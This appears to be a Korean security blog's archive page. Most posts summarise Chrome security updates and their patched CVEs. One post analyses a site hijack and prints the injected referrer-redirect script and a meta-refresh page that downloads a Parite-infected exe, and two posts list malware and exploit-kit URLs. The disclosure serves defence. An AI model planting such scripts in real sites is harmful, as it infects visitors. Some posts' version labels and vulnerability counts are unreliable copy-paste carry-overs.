'구글'에 해당되는 글 54건




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.





Google Chrome 브라우저가 42.0.2311.90 정식 버전으로 업데이트 되었습니다.


이번 42버전에서는 보안취약점도 보안 되었고, 안정화와 새로운 앱이 추가 되었습니다.

- A number of new apps, extension and Web Platform APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)

- The answer to life, the universe and everything (42퍼즐에 대한 구글 이스터에그??)


※ The answer to life, the universe and everything 이 내용은 정확히 어떤걸 말하는지 잘 모르겠다.

   "은하수를 여행하는 히치하이커를 위한 안내서" 에 나오는 퍼즐이라는데 이해를 잘 못하겠음 ㅠㅠ

   아시는 분은 댓글로 설명 좀 ㅋ 이게 왜 구글 크롬 업데이트 내용에 있는건지!!!



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 13건의 High 등급,  6건의 Medium 등급 등 총 51건의 보안 취약점이 업데이트 되었네요.

- Google Chrome 42.0.2311.90 패치 내용

■ High CVE-2015-1235 : Cross-origin-bypass in HTML parser

■ Medium CVE-2015-1236 : Cross-origin-bypass in Blink

■ High CVE-2015-1237 : Use-after-free in IPC

■ High CVE-2015-1238 : Out-of-bounds write in Skia

■ Medium CVE-2015-1240 : Out-of-bounds read in WebGL

■ Medium CVE-2015-1241: Tap-Jacking

■ High CVE-2015-1242 : Type confusion in V8

■ Medium CVE-2015-1244 : HSTS bypass in WebSockets

■ Medium CVE-2015-1245 : Use-after-free in PDFium

■ Medium CVE-2015-1246 : Out-of-bounds read in Blink

■ Medium CVE-2015-1247 : Scheme issues in OpenSearch

■ Medium CVE-2015-1248 : SafeBrowsing bypass


- 내부 보안 취약점 패치 내용

■ CVE-2015-1249 : Various fixes from internal audits, fuzzing and other initiatives.

                      Multiple vulnerabilities in V8 fixed at the tip of the 4.2 branch (currently 4.2.77.14).



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.





Google Chrome 브라우저가 41.0.2272.76 정식 버전으로 업데이트 되었습니다.


이번 41버전에서는 보안취약점도 보안 되었고, 새로운 기능보다는 안정화와 새로운 앱이 추가 되었습니다.

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 13건의 High 등급,  6건의 Medium 등급 등 총 51건의 보안 취약점이 업데이트 되었네요.

- Google Chrome 41.0.2272.76 패치 내용

■ High CVE-2015-1232 : Out-of-bounds write in media

■ High CVE-2015-1213 : Out-of-bounds write in skia filters

■ High CVE-2015-1214 : Out-of-bounds write in skia filters

■ High CVE-2015-1215 : Out-of-bounds write in skia filters

■ High CVE-2015-1216 : Use-after-free in v8 bindings

■ High CVE-2015-1217 : Type confusion in v8 bindings

■ High CVE-2015-1218 : Use-after-free in dom

■ High CVE-2015-1219 : Integer overflow in webgl

■ High CVE-2015-1220 : Use-after-free in gif decoder

■ High CVE-2015-1221 : Use-after-free in web databases

■ High CVE-2015-1222 : Use-after-free in service workers

■ High CVE-2015-1223 : Use-after-free in dom

■ High CVE-2015-1230 : Type confusion in v8

■ Medium CVE-2015-1224 : Out-of-bounds read in vpxdecoder

■ Medium CVE-2015-1225 : Out-of-bounds read in pdfium

■ Medium CVE-2015-1226 : Validation issue in debugger

■ Medium CVE-2015-1227 : Uninitialized value in blink

■ Medium CVE-2015-1228 : Uninitialized value in rendering

■ Medium CVE-2015-1229 : Cookie injection via proxies


- 내부 보안 취약점 패치 내용

■ CVE-2015-1231 : Various fixes from internal audits, fuzzing and other initiatives.

                      Multiple vulnerabilities in V8 fixed at the tip of the 4.1 branch (currently 4.1.0.21).



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


(※ 11월 19일 39버전이 정식으로 업데이트 되었지만, 이후 마이너 업데이트가 1회 있어서 39.0.2171.71이 최신이다)


Google Chrome 브라우저가 39.0.2171.65 정식 버전으로 업데이트 되었습니다.


이번 39버전에서는 보안취약점도 보안 되었지만, 기능적인 부분도 추가 되었습니다.

- 64-bit support for Mac (64Bit Mac OS 지원)

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 11건의 High 등급,  1건의 Medium 등급 등 총 42건의 보안 취약점이 업데이트 되었네요.

- Google Chrome 39.0.2171.65 패치 내용

■ High CVE-2014-7899 : Address bar spoofing

■ High CVE-2014-7900 : Use-after-free in pdfium

■ High CVE-2014-7901 : Integer overflow in pdfium

■ High CVE-2014-7902 : Use-after-free in pdfium

■ High CVE-2014-7903 : Buffer overflow in pdfium

■ High CVE-2014-7904 : Buffer overflow in Skia

■ High CVE-2014-7905 : Flaw allowing navigation to intents that do not have the BROWSABLE category

■ High CVE-2014-7906 : Use-after-free in pepper plugins

■ High CVE-2014-0574 : Double-free in Flash

■ High CVE-2014-7907 : Use-after-free in blink

■ High CVE-2014-7908 : Integer overflow in media

■ Medium CVE-2014-7909 : Uninitialized memory read in Skia


- 내부 보안 취약점 패치 내용

■ CVE-2014-7910 : Various fixes from internal audits, fuzzing and other initiatives



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.



Google Chrome 브라우저가 38.0.2125.101 정식 버전으로 업데이트 되었습니다.


이번 38버전에서는 보안취약점도 보안 되었지만, 기능적인 부분도 추가 되었습니다.

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 1건의 Critical 등급, 6건의 High 등급,  4건의 Medium 등급, 1건의 Low 등급 등 총 159건의 보안 취약점이 

업데이트 되었네요.

- Google Chrome 38.0.2125.101 패치 내용

■ Critical CVE-2014-3188 : A special thanks to Juri Aedla for a combination of V8 and IPC bugs that can lead to remote code execution outside of the sandbox. 

■ High CVE-2014-3189 : Out-of-bounds read in PDFium

■ High CVE-2014-3190 : Use-after-free in Events

■ High CVE-2014-3191 : Use-after-free in Rendering

■ High CVE-2014-3192 : Use-after-free in DOM

■ High CVE-2014-3193 : Type confusion in Session Management

■ High CVE-2014-3194 : Use-after-free in Web Workers

■ Medium CVE-2014-3195 : Information Leak in V8

■ Medium CVE-2014-3196 : Permissions bypass in Windows Sandbox

■ Medium CVE-2014-3197 : Information Leak in XSS Auditor

■ Medium CVE-2014-3198 : Out-of-bounds read in PDFium

■ Low CVE-2014-3199 : Release Assert in V8 bindings


- 내부 보안 취약점 패치 내용

■ CVE-2014-3200: Various fixes from internal audits, fuzzing and other initiatives (Chrome 38)



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 37.0.2062.94 정식 버전으로 업데이트 되었습니다.

이번 37버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가 되었습니다.


- DirectWrite support on Windows for improved font rendering (윈도우 폰트 랜더링 향상을 위한 DirectWrite 지원)

- A number of new apps/extension APIs (새로운 앱과 확장 API)

- Lots of under the hood changes for stability and performance (안전성과 성능 변화)



취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 2건의 Critical 등급, 4건의 High 등급,  3건의 Medium 등급 등 총 50건의 보안 취약점이 업데이트 되었네요.

 Google Chrome 37.0.2062.94 패치 내용

- Critical CVE-2014-3176, CVE-2014-3177 : A special reward to lokihardt@asrt for a combination of bugs in V8, IPC, sync, and extensions that can lead to remote code execution outside of the sandbox

- High CVE-2014-3168 : Use-after-free in SVG

- High CVE-2014-3169 : Use-after-free in DOM

- High CVE-2014-3170 : Extension permission dialog spoofing

- High CVE-2014-3171 : Use-after-free in bindings

- Medium CVE-2014-3172 : Issue related to extension debugging

- Medium CVE-2014-3173 : Uninitialized memory read in WebGL

- Medium CVE-2014-3174 : Uninitialized memory read in Web Audio



 내부 보안 취약점 패치 내용

- CVE-2014-3175 : Various fixes from internal audits, fuzzing and other initiatives (Chrome 37)



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


Google Chrome 브라우저가 36.0.1985.143 버전으로 업데이트 되었습니다.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 2건의 High 등급 등 총 12건의 보안 취약점과

자체 내장 된 Adobe Flash Player 14.0.0.177 버전이 업데이트 되었네요.

- Google Chrome 36.0.1985.143 패치 내용

■ High CVE-2014-3165 : Use-after-free in web sockets

■ High CVE-2014-3166 : Information disclosure in SPDY


- 내부 보안 취약점 패치 내용

■ CVE-2014-3167 : Various fixes from internal audits, fuzzing and other initiatives.



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.





구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 36.0.1985.125  정식 버전으로 업데이트 되었습니다.


이번 36버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가 된 것으로 보입니다.

  • Rich Notifications Improvements (리치 알림 개선)
  • An Updated Incognito / Guest NTP design (게스트 / 익명 NTP 디자인 업데이트)
  • The addition of a Browser crash recovery bubble (브라우저 충돌 복구 기능 추가)
  • Chrome App Launcher for Linux  (리눅스용 크롬 앱 런처)
  • Lots of under the hood changes for stability and performance (안전성과 성능 변화)


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 1건의 Meduum 등급 등 총 26건의 보안 취약점이 패치되었네요

 Google Chrome 36.0.1985.125패치 내용

Medium CVE-2014-3160 : Same-Origin-Policy bypass in SVG


 내부 보안 취약점 패치 내용

-  CVE-2014-3162 : Various fixes from internal audits, fuzzing and other initiatives



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




기존의 사이트 변조는 InternetExplorer, Adobe Flash Player, Java Exploit 등 소프트웨어의 취약점 방식을 이용하여 

접속 된 PC가  취약점이 존재 할 시 특정 파일을 받게 되는 드라이브 바이 다운로드(Drive-by-Download)방식이 대부분 이였다.


그래서 이전에 기존 사이트 변조와는 다른 iframe 을 이용한 악성코드 다운로드 방식을 소개 한 적이 있었다.


이번에 발견 된 내용은 이와는 또 다른 방식으로 악성코드를 다운로드 시키고 있다.

실제로는 아주 옛날부터 사용해왔던 방식이지만, 최근 6월 11일 부터 우후죽순으로 발생하고 있어 주의가 필요하다.

(일명, 사이트 납치라고도 불리운다)


※ 참고사항 ※

- 현재까지 해당 스크립트로 연결 된 EXE URI

http://61.147.**.***:9098/xl.exe

http://pds25.egloos.com/pds/*****/**/**/ics.exe

http://61.147.**.***:9098/Tistory.exe

http://pds26.egloos.com/pds/*****/**/**/Tistory.exe

http://pds25.egloos.com/pds/*****/**/**/tistory.exe

http://pds27.egloos.com/pds/*****/**/**/DynaPass32.exe

http://pds25.egloos.com/pds/*****/**/**/story.exe

http://www.e-****.kr/Pds/*******/GroupIcon/snss.exe

http://61.147.**.****:8878/xldos.exe

http://1402850290.************.com/sink/jie_sink.exe

http://61.147.**.***:9898/ccy.exe

http://61.147.**.***:9898/story.exe

http://61.147.**.***:9898/Tistory.exe

http://115.68.**.**:9898/story.exe


※ 모두 Virut or Parite 바이러스에 감염 되어 있는 상태이다.



그럼 간단하게 이번 방식에 대해서 알아보자.


우선 실제 유포가 되고 사이트를 한번 확인해 볼 필요가 있다.

유포 사이트에는 아래와 같은 스크립트가 삽입되어 있다.

<script language="javascript" type="text/javascript">

var url = document.referrer;

if (url.indexOf("naver")>0){

window.location.href="http://farmerr.link"; 


}


if (url.indexOf("google")>0){

window.location.href="http://farmerr.link"; 

}


if (url.indexOf("daum")>0){

window.location.href="http://farmerr.link"; 

}

</script>


해당 스크립트의 내용은 아주 간단하다.

Document.Referrer 함수를 이용하여 naver, google, daum 을 통해 해당 사이트에 접속을 하였다면,

http://farmerr.link 사이트로 URL을 반환하는 기능을 하는 스크립트이다.


아마도 해당 블로그가 해킹되어 제작자가 임의로 스크립트를 넣어 둔 것으로 보인다.

Mass injection 같은 해킹방법은 아닌 것으로 판단된다.


그래서 실제 사이트를 직접방문할 경우에는 아무런 반응이 없지만,

검색을 통해 사이트에 접속 할 경우에는 상황이 다르다.

(※ 부득이 하게 사이트명은 모자이크!!)





그리고 반환 된 URL(http://farmerr.link)로 접속하면 아래와 같이 스크립트를 통해 exe를 다운로드 받을 수 있게 되어 있다.

<script>if(top!=self) top.location=this.location;</script>

<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=EUC-KR">

<title>여러분의 방문을 환영합니다.</title>

<meta http-equiv="refresh" content="0;url=http://61.147.**.***:9098/xl.exe">

</head>

</html>





해당 다운로드 된 xl.exe 파일Win32.Parite.B 로 감염이 되어 있으며, 

치료는 기본 백신에서도 가능하고 아래의 전용백신으로도 가능하다.



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 35.0.1916.153  버전으로 업데이트 되었습니다.


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 2건의 High 등급, 1건의 Meduum 등급 등 총 4건의 보안 취약점과 

자체 내장 된 Adobe Flash Player 14.0.0.125 버전이 패치되었네요

- Google Chrome 35.0.1916.153패치 내용

■ High CVE-2014-3154 : Use-after-free in filesystem api

■ High CVE-2014-3155 : Out-of-bounds read in SPDY

■ Medium CVE-2014-3156 : Buffer overflow in clipboard


- 내부 보안 취약점 패치 내용

■ CVE-2014-3157 : Heap overflow in media



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.




구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.




Google Chrome 브라우저가 35.0.1916.114  정식 버전으로 업데이트 되었습니다.


이번 35버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가 된 것으로 보입니다.

  • More developer control over touch input (터치입력을 통한 더 많은 개발자 통제)
  • New JavaScript features (새로운 자바스크립트 기능)
  • Unprefixed Shadow DOM (접두어를 사용하지 못하는 Shadow DOM)
  • A number of new apps/extension APIs (새로운 앱과 확장 API)
  • Lots of under the hood changes for stability and performance (안전성과 성능 변화)


취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 

해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.


이번 보안 업데이트는 3건의 High 등급, 3건의 Medium 등급 등 총 23개의 보안 취약점이 패치되었습니다.

- Google Chrome 35.0.1916.114 패치 내용

■ High CVE-2014-1743 : Use-after-free in styles

■ High CVE-2014-1744 : Integer overflow in audio

■ High CVE-2014-1745 : Use-after-free in SVG

■ Medium CVE-2014-1746 : Out-of-bounds read in media filters

■ Medium CVE-2014-1747 : UXSS with local MHTML file

■ Medium CVE-2014-1748 : UI spoofing with scrollbar


- 다중 보안 취약점 패치 내용

■ CVE-2014-1749 : Various fixes from internal audits, fuzzing and other initiatives

■ CVE-2014-3152 : Integer underflow in V8 fixed in version 3.25.28.16



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



티스토리와 연동되어 사용되고 있던 외부 광고 서비스인 올블릿(Allblet)에서 악성 스크립트로 인한 악성코드 유포가 지속적으로
나타남에 따라 티스토리에서는 올블릿 플러그인 서비스를 종료 하기로 공지하였다.


올블릿은 아래와 같이 플러그인 형태로 기존까지 티스토리에서 제공되었다.



올블릿 플러그인 종료 안내 (4/23)


안녕하세요. TISTORY입니다.


포스팅 내용과 연관된 광고를 노출해주는 올블릿 플러그인이 4월23일자로 종료 될 예정입니다.

올블릿 광고를 통해 중개된 일부 사이트들로 인하여, 사용 중인 블로그가 악성코드 감염 및 유포 가능성이 있는 페이지로 분류되어 많은 유저들이 이용에 어려움을 겪고 있습니다. 이에 따라 올블릿 플러그인을 종료하게 되었습니다. 서비스 이용에 어려움 없도록 자세히 읽어주시기 바랍니다. 


[올블릿 플러그인 종료]

종료 일자 : 2014년 4월 23일(수)

종료 사유 : 올블릿 플러그인 사용 시 일부 브라우저에서 악성코드 주의 페이지로 접근 차단됨

                 (관련 공지 - http://notice.tistory.com/2152)



올블릿 서비스와 관련된 문의는 올블릿 사이트를 통해 해주시기 바랍니다. ▶ 올블릿 사이트 바로가기


또한 플러그인 종료 후에도 블로그에 올블릿 광고 배너를 삽입하고자 하실 경우, 올블릿 사이트에서 발급 받은 코드를 스킨이나 본문에 입력하여 사용하실 수 있으니 참고 부탁드립니다.


앞으로 여러분들께 소개할 수 있는 새로운 기능이나 혜택 등 다양한 좋은 소식으로 찾아뵙도록 노력하겠습니다. 언제나 최선을 다하는 티스토리가 되겠습니다.


감사합니다.


※ 원본 출처 : http://notice.tistory.com/2161



실제로 올블릿(Allblet) 광고 서버를 통해 악성코드 유포는 이루어졌다.


우선 관련 된 내용에 대한 보안 블로거들의 포스팅들을 모아보았다.


□ 관련 내용


위의 내용을 보면 알겠지만, 올해 3월 중순부터 올블릿 광고 서버에서는 주말마다 꾸준히 악성코드가 유포 되었다.

(실제로는 3월 초(2014-03-08)부터 유포가 시작되었다.)


악성코드 유포는 아래 그림 같이 광고서버를 통해 유포가 되었다. 
(아래의 그림은 gif 파일로 링크가 되지 않음) 



처리의 블로그도 올블릿 광고 사용자였기 때문에 배포가 된 적이 있었다.

다행스럽게 빠르게 확인 해주신 지인분이 계셔서 신속하게 광고 서버를 뺄 수 있었다.
(보통 크롬을 사용하게 되면 구글 세이프 브라우징에 의해 차단이 가능하다) 


아래의 내용은 저번 주 주말이였던 2014년 04월 18일 ~ 19일에 사이에 유포되었던 내용이다.

hxxp://www.midiaapp.com/data/css/index.html (Dadong Exploit Kit)

hxxp://www.midiaapp.com/data/css/jpg.js (Java Deployment Toolkit)

hxxp://www.midiaapp.com/data/css/swfobject.js (Flash Deployment Toolkit)

hxxp://www.midiaapp.com/data/css/pDmrh8.jpg (Java Exploit CVE-2011-3544)

hxxp://www.midiaapp.com/data/css/zPdL6.jpg (Java Exploit CVE-2012-0507)

hxxp://www.midiaapp.com/data/css/LeLBKR7.jpg (Java Exploit CVE-2012-1723)

hxxp://www.midiaapp.com/data/css/wzGa2.jpg (Java Exploit CVE-2012-4681)

hxxp://www.midiaapp.com/data/css/ceKAo8.jpg (Java Exploit CVE-2012-5076)

hxxp://www.midiaapp.com/data/css/KhAz4.jpg  (Java Exploit CVE-2013-0422)

hxxp://www.midiaapp.com/data/css/SsvK2.jpg (Java Exploit CVE-2013-2465)

hxxp://www.midiaapp.com/data/css/SsvK2.swf (SWF Exploit CVE-2013-0634)

hxxp://www.midiaapp.com/data/css/pDmrh8.html (XML Exploit CVE-2012-1889)

hxxp://www.midiaapp.com/data/css/Uxkust2.html (XML Exploit CVE-2012-1889)

hxxp://7ygv.ycun8.com/jc/qvod.exe (Spyware.PWS.KRBanker.D)
 

* 유포지는 모두 차단되었기 때문에 모자이크처리 하지 않음



이번 티스토리의 올블릿 플러그인 종료는 아주 좋은 판단이라고 생각한다.


또한 자신이 운영 중인 블로그가 악성코드 주의 페이지로 분류되는지는 구글에서 제공하는 세이프 브라우징을 사용하여
분류 사유와 함께 확인 할 수 있다.
 

☞ 내 티스토리 블로그 진단하기 : http://www.google.com/safebrowsing/diagnostic?site=블로그 주소


그 날 이후, 올블릿 광고를 빼고 다시는 넣지 않았다.


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.



Google Chrome 브라우저가 34.0.1847.116  버전으로 업데이트 되었습니다.

이번 34버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가 된 것으로 보입니다.
  • Responsive Images and Unprefixed Web Audio (빠른 이미지와 웹 오디오 기능 보안)
  • Import supervised users onto new computers (관리대상 사용자 가져오기 기능)
  • A number of new apps/extension APIs (새로운 앱과 확장 API)
  • A different look for Win8 Metro mode (Win8 메트로 모드에서의 화면 변화)
  • Lots of under the hood changes for stability and performance (안전성과 성능 변화)

취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 9건의 High 등급, 3건의 Medium 등급 등 총 11건의 보안 취약점과
자체 내장 된 Adobe Flash Player 13.0.0.182 버전이 패치되었네요

- Google Chrome 33.0.1750.154 패치 내용

■ High CVE-2014-1716 : UXSS in V8
■ High CVE-2014-1717 : OOB access in V8
■ High CVE-2014-1718 : Integer overflow in compositor
■ High CVE-2014-1719 : Use-after-free in web workers
■ High CVE-2014-1720 : Use-after-free in DOM
■ High CVE-2014-1721: Memory corruption in V8
■ High CVE-2014-1722 : Use-after-free in rendering
■ High CVE-2014-1723 : Url confusion with RTL characters
■ High CVE-2014-1724 : Use-after-free in speech
■ Medium CVE-2014-1725 : OOB read with window property
■ Medium CVE-2014-1726 : Local cross-origin bypass 
■ Medium CVE-2014-1727 : Use-after-free in forms 
■ CVE-2014-1728 : Various fixes from internal audits, fuzzing and other initiatives
■ CVE-2014-1729 : Multiple vulnerabilities in V8 fixed in version 3.24.35.22


- Adobe Flash Player 13.0.0.182 패치 내용
■ CVE-2014-0506 : These updates resolve a use-after-free vulnerability that could result in arbitrary code execution
■ CVE-2014-0507 : These updates resolve a buffer overflow vulnerability that could result in arbitrary code execution
■ CVE-2014-0508 : These updates resolve a security bypass vulnerability that could lead to information disclosure
■ CVE-2014-0509 : These updates resolve a cross-site-scripting vulnerability 


크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 

블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.



Google Chrome 브라우저가 33.0.1750.154  버전으로 업데이트 되었습니다.

취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 4건의 High 등급의 보안 취약점 패치되었네요
특히 Pwn2Own 대회에서 프랑스 보안업체 VUPEN 회사와 익명의 제출자에 의해 확인 된 취약점들이 해결되었습니다.

- Google Chrome 33.0.1750.154 패치 내용

■ High CVE-2014-1713 : Use-after-free in Blink bindings

■ High CVE-2014-1714 : Windows clipboard vulnerability

■ High CVE-2014-1705 : Memory corruption in V8

■ High CVE-2014-1715 : Directory traversal issue



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


Google Chrome 브라우저가33.0.1750.149  버전으로 업데이트 되었습니다.

취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 3건의 High 등급 외 총 7건의 보안 취약점과 자체 내장 된 Adobe Flash Player 12.0.0.77 버전이 패치되었네요

- Google Chrome 33.0.1750.149 패치 내용

■ High CVE-2014-1700 : Use-after-free in speech

■ High CVE-2014-1701 : UXSS in events

■ High CVE-2014-1702 : Use-after-free in web database

■ High CVE-2014-1703 : Potential sandbox escape due to a use-after-free in web sockets

■ CVE-2014-1704 : Multiple vulnerabilities in V8 fixed in version 3.23.17.18



- Adobe Flash Player 12.0.0.77 패치 내용

■ CVE-2014-0503 : These updates resolve a vulnerability that could be used to bypass the same origin policy

■ CVE-2014-0504 : These updates resolve a vulnerability that could be used to read the contents of the clipboard



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 


블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.



구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.


Google Chrome 브라우저가 33.0.1750.117  버전으로 업데이트 되었습니다.

취약점에 영향을 받는 낮은 버전 제품 사용시 악성코드 감염 등 보안 위협에 쉽게 노출될 수 있으니, 
해당 제품을 사용하시는 사용자들은 최신 버전으로 업데이트 후 사용하시기 바랍니다.

이번 보안 업데이트는 5건의 High 등급, 3건의 Medium 등급, 1건의 Low 등급 등 총 28건의 보안 취약점을 패치하는
9건의 업데이트가 진행
됩니다.

■ High CVE-2013-6652 : Issue with relative paths in Windows sandbox named pipe policy

■ High CVE-2013-6653 : Use-after-free related to web contents

■ High CVE-2013-6654 : Bad cast in SVG

■ High CVE-2013-6655 : Use-after-free in layout

■ High CVE-2013-6656 : Information leak in XSS auditor

■ Medium CVE-2013-6657 : Information leak in XSS auditor

■ Medium CVE-2013-6658 : Use-after-free in layou

■ Medium CVE-2013-6659 : Issue with certificates validation in TLS handshake

■ Low CVE-2013-6660 : Information leak in drag and drop



크롬을 사용하시는 분들은 업데이트 하여 사용하시길~!!

업데이트 방법은 크롬의 우측상단에 "Chrome 설정 및 관리" 에서 "Chrome 정보" 를 클릭하면 자동으로 업데이트 된다. 



블로그 이미지

처리 

이것 저것 끄적여 보는 공간으로 만들었습니다.


구글에서 제공하는 오픈소스 기반 브라우저인 크롬(Google Chrome)의 업데이트가 공개되었다.



Google Chrome 브라우저가 32.0.1700.76  버전으로 업데이트 되었습니다.

이번 32버전에서는 보안취약점도 보안되었지만, 기능적인 부분도 추가되 된 것으로 확인 되네요.
